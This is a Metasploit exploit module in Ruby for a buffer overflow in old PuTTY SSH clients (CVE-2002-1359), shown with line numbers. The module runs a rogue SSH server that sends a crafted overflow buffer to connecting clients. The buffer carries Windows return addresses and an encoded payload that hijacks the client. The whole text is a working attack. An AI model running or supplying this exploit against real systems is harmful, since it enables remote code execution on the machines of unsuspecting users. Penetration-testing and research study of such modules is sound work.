Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'PuTTY Buffer Overflow',
14
      'Description'    => %q{
15
        This module exploits a buffer overflow in the PuTTY SSH client that is
16
        triggered through a validation error in SSH.c. This vulnerability
17
        affects versions 0.53 and earlier.
18
      },
19
      'Author'         => 'MC',
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          [ 'CVE', '2002-1359' ],
24
          [ 'OSVDB', '8044'],
25
          [ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ],
26
          [ 'BID', '6407'],
27
        ],
28
      'DefaultOptions' =>
29
        {
30
          'EXITFUNC' => 'process',
31
        },
32
      'Payload'        =>
33
        {
34
          'Space'    => 400,
35
          'BadChars' => "\x00",
36
          'MaxNops'  => 0,
37
          'StackAdjustment' => -3500,
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
43
          [ 'Windows XP SP2 English',   { 'Ret' => 0x76b43ae0 } ],
44
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],
45
        ],
46
      'Privileged'     => false,
47
      'DisclosureDate' => '2002-12-16',
48
      'DefaultTarget'  => 0))
49

50
    register_options(
51
      [
52
        OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
53
      ])
54
  end
55

56
  def on_client_connect(client)
57
    return if ((p = regenerate_payload(client)) == nil)
58

59
    buffer =
60
      "SSH-2.0-OpenSSH_3.6.1p2\r\n" +
61
      "\x00\x00\x4e\xec\x01\x14" +
62
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
63
      "\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" +
64
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 2) +
65
      (((rand_text_alphanumeric(64)) + ",") * 2) + rand_text_alphanumeric(21) +
66
      [target.ret].pack('V') + make_nops(10) + p.encoded +
67
      (((rand_text_alphanumeric(64)) + ",") * 15) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
68
      (((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
69
      (((rand_text_alphanumeric(64)) + ",") * 21) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde" +
70
      (((((rand_text_alphanumeric(64)) + ",") * 30) + rand_text_alphanumeric(64) + "\x00\x00\x07\xde") * 6) +
71
      "\x00\x00\x00\x00\x00\x00"
72

73
    print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
74

75
    client.put(buffer)
76
    handler
77

78
    service.close_client(client)
79
  end
80
end
81

82